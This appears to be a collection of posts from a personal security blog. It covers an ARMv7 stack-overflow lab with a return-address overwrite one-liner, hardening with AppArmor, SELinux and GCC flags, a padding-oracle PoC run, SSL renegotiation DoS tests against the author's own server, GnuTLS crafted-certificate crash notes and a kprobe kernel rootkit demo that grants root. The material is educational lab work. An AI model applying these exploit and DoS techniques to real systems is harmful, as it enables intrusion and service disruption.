Hello, stack bufferoverflow on Debian ARMv7

I haven't make my hands *dirty* for a long time since I stopped on io-wargame lvl11. As we all know that ARM architectures are becoming sec guys's daily bread. I think it's time to begin my journey to explore what's the diff between ARMv7 and x86/x64 out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this great article to install a Debian GNU/Linux for ARMv7( armhf) distro. After the installation, you probably want to config a NAT network between host and qemu guest. Or just use my network config.

To figure out the memory layout is a good starting point. Take a glance at the code at 1st, plz.....

shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
   0x00008448 <+0>:    push    {r7, lr}
   0x0000844a <+2>:    sub    sp, #8
   0x0000844c <+4>:    add    r7, sp, #0
   0x0000844e <+6>:    str    r0, [r7, #4]
   0x00008450 <+8>:    str    r1, [r7, #0]
   0x00008452 <+10>:    movw    r3, #34040    ; 0x84f8
   0x00008456 <+14>:    movt    r3, #0
   0x0000845a <+18>:    mov    r0, r3
   0x0000845c <+20>:    movw    r1, #33797    ; 0x8405
   0x00008460 <+24>:    movt    r1, #0
   0x00008464 <+28>:    movw    r2, #33845    ; 0x8435
   0x00008468 <+32>:    movt    r2, #0
   0x0000846c <+36>:    blx    0x8340
   0x00008470 <+40>:    ldr    r3, [r7, #0]
   0x00008472 <+42>:    add.w    r3, r3, #4
   0x00008476 <+46>:    ldr    r3, [r3, #0]
   0x00008478 <+48>:    mov    r0, r3
   0x0000847a <+50>:    bl    0x8404
   0x0000847e <+54>:    mov.w    r3, #0    ==> 0x0000847e should be the return address of test()
   0x00008482 <+58>:    mov    r0, r3
   0x00008484 <+60>:    add.w    r7, r7, #8
   0x00008488 <+64>:    mov    sp, r7
   0x0000848a <+66>:    pop    {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
   0x00008434 <+0>:    push    {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
   0x00008436 <+2>:    add    r7, sp, #0
   0x00008438 <+4>:    movw    r0, #34024    ; 0x84e8
   0x0000843c <+8>:    movt    r0, #0
   0x00008440 <+12>:    blx    0x8358
   0x00008444 <+16>:    pop    {r7, pc}
End of assembler dump.

Let's check the memory layout:

(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11      strcpy(buf, input);
(gdb) n
12      printf("%s \n", buf);
(gdb)
AAAABBBB
13    }
(gdb) x/12x $sp
0x7efff658:    0x00000000    0x7efff919    0x000084f8    0x41414141
0x7efff668:    0x42424242    0x00008400    0x7efff678    0x0000847f==> ret addr of test()
0x7efff678:    0x7efff7d4    0x00000002    0x00000000    0x76f12cfb

So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]

Why the hell the addr of 0x0000847e we saw above now became 0x0000847f. Weird...Anyone know about what happened?

OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A' , "4\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�

Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17      printf("being hacked\n");
(gdb) n

Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.

Did you see this? +1 with the fuc_me()'s addr, plz.....

(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff90f 'A' , "5\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked

Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=) at victim.c:13
13    }

It worked! So, the exp should be like:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault
===========================

I guess the exploit of ARM would be much different to x86. I've heard of ret2libc won't work on ARM. That's really interesting and worth to figure it out. Obviously, this Phrack paper and some manuals should be added into my must-read list.

Say "hello nftables" on Debian 7 GNU/Linux

Nftables is the 4th generation packet filter engine for linux kernel and it will be merged into kernel 3.13. I haven't play with netfilter for a while. When I saw Nftables a couple of days ago, I think there's something( iteches?) I need to scratch;-) Let's try to say "Hi" to nftables.

OS: Debian 7 GNU/Linux. Grab the small version of iso here.

After the installation. Some packages are needed to be install also:
#apt-get install git vim libgmp-dev libreadline-dev libtool autoconf gcc make pkg-config libjansson-dev libmxml-dev flex bison libncurses5-dev kernel-package

Firstly, you need to compile two libraries: libmnl and libnftables
git clone git://git.netfilter.org/libmnl
cd libmnl/
./autogen.sh
./configure
make
sudo make install
sudo ldconfig

git://git.netfilter.org/libnftables
cd libnftables/
./autogen.sh
./configure --with-json-parsing --with-xml-parsing
make
sudo make install
sudo ldconfig

Then, compile/install the userspace tool( nft):

git clone git://git.netfilter.org/nftables
cd nftables
./autogen.sh
ac_cv_func_malloc_0_nonnull=yes ac_cv_func_realloc_0_nonnull=yes  ./configure
make
sudo make install
sudo ldconfig

Well, because linux-3.13 is not release yet. So we need to grab the source code from nftables dev tree:

git clone git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nftables.git linux
cp /boot/config-3.2.0-4-686-pae .config
make menuconfig( select these NF_TABLES options)
make -j 3 deb-pkg
cd ../
sudo dpkg -i *.deb

Reboot your machine. Let's try some policies. Thanks to the author whoever wrote this HOWTO. Nftables policy is seem easy to write. But I'm still not get used to the new style since I even don't know how to delete a table. It always saying the device is BUSY or something like that. WTH~ I checked the commits, it should be a feature though. I think the policy converter tool between iptables and nftables, that is necessary. Otherwise, it'd be barries to those old school iptables users/admin/developers.

RTL-SDR version of "Hello World"

Telco sec is always a fascinating field I want to get involve with. Why? Because those old school Phrack guys has playing both computer sec and telco sec. I missed the golden age of Phrack that was bothered me for a while. It won't stop me to dive into any field I want now. If what makes you tick is only for profit( money?), come on, you probably won't be having qualify to mention the term "underground spirit";-)

About 1 month ago, a friend( Can't list his/her name here-_-) sent me a slide about Femtocell hacking and asked if I may have interest in it. Of course, I have. But...well, there's always a fucking "but", isn't it?...femtocell is a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker( Can't list his/her name too-_-) mentioned about there are cheap devices I could buy some for learning telco stuff: RTL-SDR. Everything you need to know is already in this website. I bought tuner, antenna, freq counter, SMA-MCX converter,etc... then I was catching the shit in the air. FM at first, MODE-S transmission and GSM sniffing. What I have learned/done in past two weeks is really shocking my mind and it is definitely actived a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and kernel are already a burden that's hard to carry on. Hope I can make it this time.............I really appreciate those who were/are contributed/contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.

Freq counter, it probably could be detecting IR-based controller

 

 Catching the shit in the air( not the wire) 

Support EFF....

Syscan Beijing 2013 slides

I've been to 5 conferences ( KCONv2, XCON2013, ISC2013, OWASP Beijing 2013, Syscan Beijing 2013) in past months. The 1st four confs were sucks. But the Syscan brought us very high quality. Don't get me wrong. Some people think these 4 conferences are good. Because they are websec guys or windows guys. As a GNU/Linux sec guy, these conferences were drugging me to sleep;-) So, I only bullshit a little bit of Syscan here. Stefan Esser's presentation "Tales from iOS 6 Exploitation" shocked us;-) A lot of people thought Stefan many pieces technique elements in the process of exploiting and each one of them are difficult to deal with. But Stefan did them all at once. That's fuc*ing super awesome. NGUYEN Anh Quynh's presentation is about ROP gadgets. I don't know much about this field. I only used some open source ROP gadgets finder once or twice. Anyway, Nguyen's talk was also blowed up my mind in the 1st day of the conference. Because his apporach is combine a llvm compiler based( dude, you are using formal logic to deal with a sec shit! Fuc*ing awesome). Plz take a look at his slide. There were other great presentations. I'll leave the download slide in the end.

Another funny story is in the almost end of Jonathan's presentation. A guy who asked him about FE. He just told us FE is nothing but a good advertising company. The real heroes are grsecurity guys: They invented the concept of ASLR, and more....btw, take a look at how grsec deal with stack canary in the hardend kernel;-)

I've packed all slides into one tar.bz file.

Can you fucking imagine that the conference organizers( I wouldn't name you motherfuckers) brought these girls( sexy? I don't think so) there? I don't care about girls in a conference. As our type of guys, we'd go out to the club/bar after conference. Unfortunately, I've already get married, which means "fuck around" part is not belong to me;-)

Trip of Thessaloniki for osc 2013

As many people mentioned, openSUSE conference 2013 was held on July 18 to July 22 in Thessaloniki, Greece. After 20hrs in the air and waiting in the airport( for transfer), I arrived in the city of Thessaloniki about 3:00 PM on July 17. Then I went to the sea side by buy No.78. It was really nice view there. Then I took a taxi to hotel for another 12 hrs sleep;-) I visited to the white tower and Aristotle square. The great Philosopher Aristotle was born in the place where near by the city of Thessaloniki. I thought Aristotle was visit the city but I haven't find the related information yet.

It was really nice to be there. Local people are so relaxing. Much relaxer than I feel in Beijing. I love this place, I do. I met many interesting guys here, including security guys and non-security guys. Some people I met in Thessaloniki, we all love beer/sec/gaming/system of a down/ramstein/Nirvana/etc....even the background music of main conference room was Nirvana songs. Man, can you believe it? I never see it happened in China. They guys are really awesome. I also met some sec guys there. They are very skilled and talented dudes. I think I learned not less from them in few days.

This trip makes me feel my way back home. Most people doesn't like what I like in BJ. I think the whole fucking society just can't accept the type of person like me. I don't wanna change.

-------------------------------------------------------------------------
 - I love punk rock and metal, am I wrong?
 - I love Philosophy/Theology/History, am I fucking wrong?
 - I love Tri-A title computer/video games, am I fucking wrong?
 - I don't care how much money I earn( I can still feed my family, you piece of shit-_-), am I wrong? 
 - I hate the type of guys in suit who are just dead inside( walk) with their fucking boring day job, am I fucking wrong?
 ------------------------------------------------------------------------

I don't think I'm a weirdo guy. But most Chinese people I met in BJ just think that way. Don't give me wrong...I have some very awesome friends. They are Chinese dudes/ladies. But we are minorities....Greenday is always supporting us: "I wanna be the minority... I don't need your authorirty...Down with moral majority"...aha, I really love this song;-)

btw: The food in the city of Thessaloniki are really awesome, especially the seafood. And, I as a newbie had a presentation "Introduction to GNU/Linux hardening" in osc 2013.

Nice view, ha?

old good port

White Tower, or maybe we should call it "The Greece Tower"

I hadn't find the ASSOS yet;-)

 Little dude, you got a gun?

 Olympic Museum, this is the place for osc2013

  Gecko money is not a bad idea, isn't it?

 Sometime, RMS is wrong. Free speech is as free beer;-)

 July 23, people are gone

 I love this shit!@#$%^&*()

 Istanbul - In the map of Civilization IV, ring the bell?

 Awesome architecture...........

review the book "Profiling Hackers"

I've been reading the book of Profiling Hackers recently. For now, I only looked through a little bit. There are some topics are very interesting, so I'd like to share with you guys.

This book listed some questions below:

---------------------------------------------------
Why am I interested in hacking?
What are my objectives?
What am I trying to obtain through hacking?
What do I want to become?
What do I want people to think of me?
How do I want to be remembered, and what for?
---------------------------------------------------

It's the matter of the motivation of hacking. IMHO, hackers are always hacking for fun and yes, indeed( we can't deny it, right-_-) ..the profit. AlpheOne's paper's title was sort of philosophical metaphors;-) Both of motivations( fun/profit) are very important. Because if a security guy only care about one of them, it would be devastating for a person( hacker)'s life. 

* Fun? To some hackers, hacking is part of their life. They can't live with hacking. They are happy with joy while writing exploit...

* Profit? Money, of course. White hat working for commercial company. Black hat?

* Both White and Black are possible to sale exploit or get involve with underground business

But....as a hacker, if we: 

Only having the "fun" part. too spiritual dude... and it's hard to make the people( industry) believe you in real-life sec engineering.... Well, if the security is not your day job, that's another story;-)

Only having the "profit" part:
even worse, just like a lot of security conference runners( whores-_-) who only having one slide/topic and guffing around the world. They are a bunch of dead walks

As a real hacker, I do believe that he/she would have both of them.

And, the book also talking about the common trait of hackers, no matters of age, profession, ethnic, etc:

------------------------------------------------------------------------
* They usually have an above average IQ and great technical and problem-solving skills.
* They are brilliant adolescents, suffocated by an inadequate school system and by ill-prepared or poorly equipped teachers.
* They generally come from problem families.
* They rebel against all symbols or expressions of authority.
------------------------------------------------------------------------

It's true. Except the 3rd one is a little bit of vague. How to define the "problem families"? Divorce? or others? If it is mean that a family is lack of proper( btw: wth is *proper*) educate/homeschool for the kid, well...it'd be mean a huge number of families.

I'm not finish the reading. It's really great book. I never found a book which giving a way in sociology to discussion about hackers. The Hacker ethic and the spirit of Information age did some aspect of the work, but Pekka was more focus on the generic hacker( not only in computer/sec field).

How to Hardening your own program in GNU/Linux

Platform: OpenSUSE 12.3

Apparmor is a implementation of confinement technology. It could help you prevent those unknown attacks like 0-day vulnerability. In OpenSUSE/Ubuntu, it's very easy to install it. For the case in openSUSE 12.3, type "yast2" in terminal or use GUI software management can install the apparmor. Once you install the apparmor, you need to make the profile for the program what you want to be hardened.

Firstly, please download the example files here. Then compile the program:

shawn@linux-sk8j:~> gcc apparmor_test.c

Generate the profile for your program:
shawn@linux-sk8j:~> sudo /usr/sbin/genprof a.out

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

.........................................
.........................................
.........................................

Finished generating profile for /home/shawn/a.out.
 -----------------------------------------------------------

Then you can find the profile in /etc/apparmor.d/home.shawn.a.out. Add a few of lines into it like this:

#include

/home/shawn/a.out {
#include

   /home/shawn/a.out mr,
   /home/shawn/hello r,
   /home/shawn/world w,
   network stream,
}

Because apparmor is using whitelist-like policy in default. The above example means: only allows this program( a.out) have the read permission on file /home/shawn/hello, the write permission on file /home/shawn/world and the tcp connection. If this program have a stack-based buffer overflow issue, the attacker might want to spawn the shell by exploit it. In this case, this not gonna be happened. For further reading about apparmor profile, you might be interested in this article. Other similar implementation like SELinux and Grsecurity/PaX could achieve the same goal. SELinux is the most powerful one but the most difficult to use.

When you done the confinment hardening, there are a lot of mitigation technology you should consider. It's much easier to use. Please keep this in mind: these defensive technology are what we called "mitigation", which means the skilled hackers or attackers having the ability to exploit it. It's only the matter of time.

GCC options:
------------------------------------------------
Stack canary:
-fstack-protector, only some functions being protected
-fstack-protector-all, protect every functions in your program

Bypass method, please check Scraps of notes on remote stack overflow exploitation in Phrack Issue 67.

Heap( malloc() corruption check):
default since glibc 2.5. Please use the latest version of glibc.

Position-Independent-Executable:
-pie, it would use the advantage of ASLR which provided by kernel. Remember turn on your ASLR:


Bypass method, please check Bypassing PaX ASLR protection in Phrack Issue 59. Yes, it's an old paper but it's still worth to read.

GOT memory corruption attack hardening of ELF binaries:
-z relro, Partial RELRO
-z relro -z now, Full RELRO

Bypass method, please check The Art Of ELF: Analysis and Exploitations

String Vulnerability mitigation:
-FORTIFY_SOURCE, mitigate string format vuln

Bypass method, please check A Eulogy for Format Strings in Phrack Issue 67.

Non-executable stack:
-z nostack

Well, there are a lot of ways to bypass it.

I also made a list a few months ago. You may want to check it too. Yes, there are a lot of mitigation tech and a lot of bypass tech. Offensive and defensive technologies are like brothers. The only matter is they will fight each other to the end of the world;-)

btw: You don't need to worry about the performance hit when you turn on these mitigation tech except -fstack-protector-all. That's it!

May L0rd's hacking spirit guide us!!!

Padding Oracle Attack PoC in C

I'm a newbie on crypto field. *Unfortunately*, I need to deal with some
open source security stuff( openssl and gnutls) in my day job. Yes,
don't be so sad for me;-) I can handle it so far. I need to know more
knowledge about crypto. The best way to do it is writing xxx-attack
PoC. Then I've heard of Lucky-13 is something. Backport these patches
from upstream drives me crazy. Dude, you known~ 13 openssl upstream
commits( more than 1,700 loc modifies) were only for fix one security
issue what called Lucky-13 Thirteen which was disclosured in Feb 2013. It
was my honor to do this shitload work with very very low salary;-)
After I finished it, a very serious question came out of my mind: What
if another tens of shitload work pop up in the future but with no help
from the upstream community? Well...I have to eat the rocket by my own
hands. F0r preparing to handle such situation, I need to know the
detail of the attack. That's why I wrote the padding oracle attack
PoC( Download here).

I googled "padding oracle attack". I found 3 guys wrote their own
padding oracle attack PoC/tools in 3 differnt languages: perl, ruby
and python. I looked their code and articles. They guys are awesome!

Brian Holyfield( Perl guy) wrote this very good article and more
importantly it's easy to understand:
 
http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html

Daoge( python one) is a CHiense hacker who are good at web
security:
http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6

Ron Bowes( Ruby guy) gave us a great presentation at Shmoocon 2013. I
really thank his practical advice. He wrote two articles about padding
oracle attack. The 1st one introduce the principle and the 2nd is
giving an great example.

http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth

http://www.skullsecurity.org/blog/2013/a-padding-oracle-example


Well, I'm a kind of old school guy. I decided write it in
C( not old enough as asm). This example is simple:

shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ make
gcc -g -o padding_oracle_attack_poc padding_oracle_attack_poc.c -lcrypto
done
shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ ./padding_oracle_attack_poc 
Ciphertext is 16 bytes: 83e10d51e6d122ca3faf089c7a924a7b
Decrypting now
205 is done: 00000000000000ce3faf089c7a924a7b
36 is done: 00000000000025cd3faf089c7a924a7b
214 is done: 0000000000d724cc3faf089c7a924a7b
230 is done: 00000000e7d023cb3faf089c7a924a7b
80 is done: 00000051e6d122ca3faf089c7a924a7b
110 is done: 00006f52e5d221c93faf089c7a924a7b
137 is done: 008a6e53e4d320c83faf089c7a924a7b
248 is done: f985615cebdc2fc73faf089c7a924a7b
The original plaintext is: "Hello World"
The one last block of plaintext: 726c6405050505050000000000000000
----> rld

btw: Thanks to Thomas Biege again..who is guiding me in not only one sec field... 

How to enable SELinux in SLES 11 SP2

I've been playing with SELinux for a few days. Once you decide to hack on SELinux, which means a very long hacking journey is begin. The 1st shit you need to do is to enable the SELinux before you dive into the details. Yes, you may already knew these great stuff could help your great SELinux hacking journey:

1, SELinux project wiki
2, The SELinux Notebook - The Foundations - 3rd Edition

The SELinux kernel module has already compiled in SUSE Linux Enterprise Server 11 SP2 but without any specific polices. OK then, I've bullshit a lot, haven't I? Please allow me bullshit a lot more;-)

Firstly, make sure SELS 11 SP2 is working well:
--------------------------------------------------------------------------------
shawn-fortress:~ # cat /etc/issue

Welcome to SUSE Linux Enterprise Server 11 SP2  (i586) - Kernel \r (\l).
-------------------------------------------------------------------------------- 

Install these packages which are needed for SELinux:
--------------------------------------------------------------------------------
zypper in libselinux1 checkpolicy libsemanage1 policycoreutils
--------------------------------------------------------------------------------


Type "yast2 bootloader" in cmdline and add:
-------------------------------------------------------------------------------- 
"security=selinux selinux=1 enforcing=0" into the kernel cmdline
--------------------------------------------------------------------------------
 In GRUB bootloader, these above 3 options are used related to SELinux.
 * security=selinux, tells the kernel to use SELinux and not AppArmor
 * selinux=1, switches on SELinux
 * enforcing=0, puts SELinux in permissive mode( only logging)


Install selinux-tools, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-tools
--------------------------------------------------------------------------------

Install selinux-policy, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-policy
--------------------------------------------------------------------------------

Add  selinux to existing PAM config file:
--------------------------------------------------------------------------------
pam-config -a --selinux
--------------------------------------------------------------------------------

set restorecond service to runlevel 3 in "expert mode":
--------------------------------------------------------------------------------
yast2 runlevel
--------------------------------------------------------------------------------

Finally, reboot your computer/laptop/s*!@#...... and check the SELinux status:

shawn-fortress:~ # sestatus
SELinux status:                 enabled
SELinuxfs mount:                /selinux
Current mode:                   permissive
Mode from config file:          permissive
Policy version:                 26
Policy from config file:        refpolicy-standard

See, it's working!

Thanks to Thomas Biege who is guiding me on this journey! Thomas's article "SELinux on openSUSE 11.1" helped me to understand the config of SELinux in big picture.

May L0rd's hacking spirit guide us!

Vuln assessment for PALADIN forensic tools free version

I went to the China Mac Forensic Conference last week. This was my 1st time I attended a security con about forensic. Some of security guys gave us a few free speech and it's all about forensic. In forenisc field, the only stuff I've know its Lynis which was written by Michael Boelen. They were talking about forensic stuff on Mac/iOS platforms in the morning. That made me a little boring. But what else can I blame about? This conference is called Mac-Forensic*. Fortunately, I found something very interesting at the afternoon. A company named SUMURI providing a forensic solution which based on GNU/Linux. This GNU/Linux distro is called "PALADIN". I got a free Live-DVD and booted it up in scene. Well, I was fuc* exicting because I got tens of shitloads of information about Mac/iOS in that day. Now I had something I'm familiar with: GNU/Linux. I found some potential risks for PALADIN GNU/Linux distro. I've already notified them. Hope they could spend more time on sec stuff.

OK. When PALADIN booted up, you can see the ubuntu-like( Unity?) GUI:

PALADIN provides a lot of open source forensic tools:

In the free version, the only closed-tool is "PALADIN Toolbox" which can be found in the Desktop and the binary file is located in /usr/bin/toolbox. This binary is using many free/open source libraries. The 1st potential issue is violation of free/open source licenses. Then I asked Steve Whalen "are you sure that toolbox has no violation of the free/open source licenses" in the scene. His answer is pretty sure that the toolbox won't be violated any free/open source licenses:

Then, I took a few mins to investigation on the binary. Firstly, the entry address:

And, it doesn't have any anti-debugging features( my examples) in it. If your asset is a closed-source binary. You should do anti-debug. A skilled reverse engineer is able to find the security issue by reversing the binary in very *short* time:

ASLR is turned on. "2" is very good, which means the kernel do the randomize for stack and heap separately. AFAIK, the issue is the ASLR only work with PIE.

Lucky Thirteen Attack is a big issue recently. The current openssl version is affected.

Well, this is it. I've done the investigation when a guy told me it's time to smb break. I'm very happy to see the company like SUMURI brings GNU/Linux into the forensic field.

Openssl renegotiation DoS attack is still an issue

Openssl renegotiate would causes DoS attack was disclosured in 2011，then THC released their DoS attack tools. This issue what we called CVE-2011-1473 until now the openssl upstream community doesn't give any solution.  So, it seems they've been leaving this issue to the application developers( suck this shit in mind), such as Apache2 provide a optional config that you can disable renegotiation.

Let's see what Apache2 server would do in most cases:

shawn@fortress / $ openssl s_client -connect build.opensuse.org:443

..............................

..............................

Timeout   : 300 (sec)  

Verify return code: 20 (unable to get local issuer certificate) ---

R   // Press R, then enter

RENEGOTIATING 140722018514592:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:592:


According to Vincent Bernat, a server will require 15 times the processing power of a client, which means an Intel i7 CPU laptop can kick a bunch of servers's ass. Plz take a look at my test data:

Test environment：SLES 11 SP2 , assigned 2 cores + 1GB memory in virtual machine

Case I:

Server: openssl s_server -key server-key.pem

Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000

The worst case:

Cpu0 : 1.3%us, 1.7%sy, 0.0%ni, 97.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st

Cpu1 : 53.1%us, 5.1%sy, 0.0%ni, 37.1%id, 0.0%wa, 0.0%hi, 0.7%si, 0.0%st

Case II:  Vincent Bernat provided us an open source hardening/mitigation solution, which add some rate-limit/fixed hex data for filtering on the netfilter.

#sh iptables.sh

#iptables -A INPUT -d 192.168.0.1 -p tcp --dport 4433 -j LIMIT_RENEGOCIATION

Server: openssl s_server -key server-key.pem

Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000

The worst case:

Cpu0 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st

Cpu1 : 0.0%us, 0.7%sy, 0.0%ni, 99.3%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st

Well done, Vincent! Your solution works. But I'm not sure this may cause the side-effect. Vincent added some fixed hex data as filtering policy on the netfilter. What if the same hex data occurs? Is false positive possible?

possible ways to exploit CVE-2012-1663

CVE-2013-1663 is a possible remote DOS attack issue. This issue has
been fixed in >=GNUTLS-3.0.14. I hacked on it for hours and figure out
a few prerequisites could make it vulnerable:

=============================
REQUIRED:

 - prior to GNUTLS 3.0.14
 - crafted certificate

=============================
Attacking SCENES

 - a client import a crafted cert file for sending req to server( CA?)

 - a "server" import a crafted cert file for sending req to other
   server( CA?)

---> With high frequency uses above manipulations

Stand on the client side, the attacker should try to construct a
crafted certificate for triggering the below function fails:

ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0);
  if (ret < 0)
    {
      gnutls_pubkey_deinit(pcert->pubkey);
      /* pcert->pubkey should be NULL now */
      ret = gnutls_assert_val(ret);
      goto cleanup;
    }

I made up two crafted cert files( client.pem, client2.pem) seems would
trigger the double free issue in client's side.

Warning: Don't try it on your host machine because it would cost too
much memory then makes your machine very slow. I highly recommend you guys use vm for testing.

shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509
processing server set to null?
Server ready. Listening to port '5556'.

shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh
................
.................
...................

Another terminal: killall client

Test platform: Slackware 13.37 + GNUTLS-3.0.13

How to compile GNUTLS-3.1.9 on Slackware 13.37

Before you dive into the detail source code of GNUTLS, you'd better compile/install it manually. But you known, hacker is always one of laziest type of person around the world. We want everything automatically. We did functional testing at first place, then we want to tranform its boring shit to automation testing. Even in security field, there are a bunch of guys( not lamer ones;-)) are trying to make the pentest/exploit shits automatically. I used to be an open source security QA guy and tried some automation tools( like ctcs) to satisfy my "lazy" requirement. Then I've starting maintain some security packages and fixing/backporting CVEs issues for "some" GNU/Linux distro. I've been doing this type of work for months but haven't compile the packages I'm maintaining with. What a shame;-)

I wrote a simple script today and it will help if you wanna compile GNUTLS in manual:

./get_repos.sh
Usage: [ Compile packages automatically: yes/no]

Type:
./get_repos.sh no  ===> only download the packages without compiliation
./get_repos.sh yes ===> download the packages then compiliation

If you choose "yes", you can check if it's really work:
Open two terminals: T1, T2

T1: Run the anonymous server with TLS
john@sl13:~/gnutls_uses$ ./anonymous_serv
Server ready. Listening to port '5556'.

- connection from 127.0.0.1, port 59923
- Handshake was completed

- Peer has closed the GnuTLS connection

T2: Run the client
john@sl13:~/gnutls_uses$ ./anonymous_cli
- Handshake was completed
- Received 18 bytes: GET / HTTP/1.0

That's it! Have fun with it!

May L0rd's hacking spirit guide us!!!

Security shit in QA work

I wrote an introduction-level article about how QA could possibly hack in security field. You can download here. There are two reasons I wrote the shit. Firstly, I want to dedicate it to Aaron Swarts who was a great hacker. Secondly, I've done some security QA stuff and I want to share some shits I hacked with you guys.

May L0rd's hacking spirit guide us!

Simple GNU/Linux kernel rootkit?

It's fucking busy on day job recently. But I still couldn't forget the most important thing: Night job. Hacking on security stuff is much fun than other technique field. Endless functional testing did really fucked my mind. I need a fresh air and take a deep breathe...PM 2.5 is fucking high in Beijing, shit*Why should I be here? I really want to go back to hometown if I can work at home. Wait a min, where is my fucking home? Switchfoot told us that we do not belong here-_-

hmm..I bullshited a lot again...Let's talk about this example program. It's a simple rootkit for GNU/Linux kernel and it was implemented via kprobe mechanism, which is provided by kernel itself. kprobe is very powerfull and it was designed for kernel debugging. Or, we could use it do our things. You known, as a security guy, makes your hands dirty in the kernel land is just matter of time. This rootkit allows use normal users do the root's business.

--------------------------------------------------------------------
Show time:
root@sl13:/home/john/dumb_rootkit# make
make -C /lib/modules/2.6.39-smp/build/ M=/home/john/dumb_rootkit modules
make[1]: Entering directory `/usr/src/linux-2.6.39'
  CC [M]  /home/john/dumb_rootkit/dumb_rootkit.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/john/dumb_rootkit/dumb_rootkit.mod.o
  LD [M]  /home/john/dumb_rootkit/dumb_rootkit.ko
make[1]: Leaving directory `/usr/src/linux-2.6.39'
root@sl13:/home/john/dumb_rootkit# insmod dumb_rootkit.ko 
root@sl13:/home/john/dumb_rootkit# exit
exit
john@sl13:~/dumb_rootkit$ /usr/sbin/iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
john@sl13:~/dumb_rootkit$ dmesg -c
[ 5700.687828] Planted jprobe at c10ffb20, handler addr d8e32000
[ 5707.502249] jprobe: filename: /usr/bin/id from bash, pid = 6393, uid = 0, gid = 0
[ 5728.728063] jprobe: filename: /usr/sbin/iptables from bash, pid = 6394, uid = 0, gid = 0
[ 5730.936214] jprobe: filename: /bin/dmesg from bash, pid = 6395, uid = 0, gid = 0
--------------------------------------------------------------------

What the fuck was going on? no more explains, plz RTFSC.....

Today is Thanksgiving Day. I'm celebrating this holiday but I'm not a Yankee. I'm a christian but I'm not very religious. I get used to call myself a "neo-calvinist technological christian". It's quite long name, isn't it? The matter is that name is not important anymore. In the cyber space( internet?), it doesn't fucking matter who you are or how rich you are. Even we( hackers?) don't care about your sexy ass. The idea is the only matter!

Thank God, Phrack is still running...and, never better!

May L0rd's hacking spirit guide us!!!

btw: I was drinking PAULANER while I was writing this shit-_-

My story - The falling of Hackerfellowship Group

Where should I begin? The story I'm going to share, that's definitely a long story.  I will make it short as possible as I could.

